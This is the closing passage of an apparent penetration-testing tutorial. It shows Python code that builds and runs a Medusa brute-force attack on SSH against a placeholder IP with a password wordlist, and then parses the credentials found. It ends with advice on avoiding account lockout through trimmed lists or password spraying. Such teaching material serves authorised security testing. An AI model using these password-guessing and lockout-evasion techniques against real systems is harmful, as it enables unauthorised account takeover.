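    proc = subprocess.run(argv, capture_output=True, text=True, check=False)
    return parse_found(proc.stdout.splitlines())


if __name__ == "__main__":
    # Placeholder target and wordlist; the wordlist directory is the one named above.
    wordlist = "/pentest/passwords/wordlists/list.txt"
    argv = build_medusa_argv("192.0.2.10", "admin", wordlist, "ssh")
    print(" ".join(argv))
    print(parse_found(SAMPLE_OUTPUT.splitlines()))
```

If count_words() on your dictionary exceeds the target's lockout threshold, trim the list to the likeliest candidates (or switch to -U with one password across many users) rather than letting Medusa run the whole file against one account.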



More to come!